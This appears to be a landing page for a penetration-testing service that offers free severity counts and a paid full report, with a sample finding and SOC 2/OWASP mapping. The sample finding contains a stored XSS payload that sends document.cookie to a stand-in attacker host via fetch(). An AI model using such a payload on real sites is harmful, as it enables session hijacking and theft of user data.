We run an authorized penetration test against your web application at no cost and share the severity counts. Unlock the full findings (reproduction steps, CVSS scores, remediation guidance, and SOC 2 evidence) for a fixed price written into the authorization before we begin.
A traditional pentest costs EUR 8,000 to EUR 40,000 and takes two months from procurement to delivery. So founders push it past the SOC 2 audit, past the enterprise procurement review, and sometimes past the breach.
We removed the cost barrier on the front end so the conversation can start with findings, not invoices. You only pay when there's something worth paying for, and you decide whether the report is worth the price after you've already seen the severity counts.
No procurement loop. No quarterly waiting list. No day-rate negotiation. The whole front end runs on a single form and a single call.
Work email and the URL of the application you want tested. That is the whole form.
Fifteen minutes to confirm in-scope assets, authentication roles, and out-of-scope subsystems. Unlock price quoted the same day.
A short document defines scope, rate limits, non-destructive rules, and the fixed unlock price. We don't start before it's countersigned.
Severity counts arrive free. Unlock the full report to receive findings, CVSS, reproduction steps, remediation guidance, and SOC 2 evidence.
The free tier exists so you can make an informed decision about the paid tier. If we find nothing critical, you owe nothing.
Every finding in the paid report follows the same structure: classification, evidence, reproduction recipe, blast radius, and a remediation snippet engineers can ship without a follow-up meeting.
The card on the right is illustrative. Download a sanitized six-page sample of the full report below.
curl -X POST https://app.example.com/api/v1/comments \
-H "Authorization: Bearer $TOKEN" \
-d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Auditors want evidence, not screenshots. The paid report cross-references each finding to the SOC 2 trust criteria it touches, and our testing coverage maps to the OWASP Web Security Testing Guide so you can show full scope, not selective sampling.
| SOC 2 control | What we test for | OWASP WSTG section |
|---|---|---|
| CC4.1 Monitoring | Detection coverage on injection, broken auth, and privilege escalation paths | WSTG-INPV, WSTG-ATHN, WSTG-ATHZ |
| CC7.1 System operations | Logging completeness and tamper resistance under attacker activity | WSTG-ERRH, WSTG-CRYP |
| CC7.4 Incident response | Verifies that alerts fire on the attack patterns your runbook claims to cover | WSTG-CONF, WSTG-IDNT |
After remediation, we re-test the same controls and issue a follow-up attestation. The re-test is included in the unlock price for 60 days.
Authorized penetration testing has been a defined practice for over twenty years. We do nothing without your signed permission, and once we have it, we follow a tight set of operational rules so the test never becomes the incident.
We confirm you control the asset via DNS TXT record or a signed letter on company letterhead. No exceptions, even when the customer is a known partner.
Automated probes are capped at 10 requests per second per host. Manual exploitation runs at human speed. Your monitoring will see traffic, not pressure.
We don't delete, modify, or exfiltrate production data. Proof-of-concept evidence is captured at the minimum depth needed to confirm the vulnerability.
Findings, proofs, and screenshots are encrypted end to end. Access is limited to the lead tester and one reviewer.
Reports are retained for 90 days to support the included re-test, then deleted on request. We never share findings with anyone outside the engagement.
Anything declared out of scope in the authorization is treated as production-critical. If a finding chains through it, we stop and check in before going further.
The pentest covers your application. The OSINT add-on covers the perimeter you cannot patch: leaked credentials in public dumps, exposed S3 buckets indexed by search engines, GitHub repositories with hardcoded tokens, and the LinkedIn footprint that makes targeted phishing trivial.
Priced as a separate engagement. Most teams add it on the second cycle, after the application findings are remediated.
Drop your work email and the URL of the application you want tested. We reply within 24 hours with a proposed scope, the unlock price, and a 15-minute call slot.
Two fields. We do the rest.
Free baseline. Paid unlock only if there's something worth paying for. Scoped this week.
Request a free pentest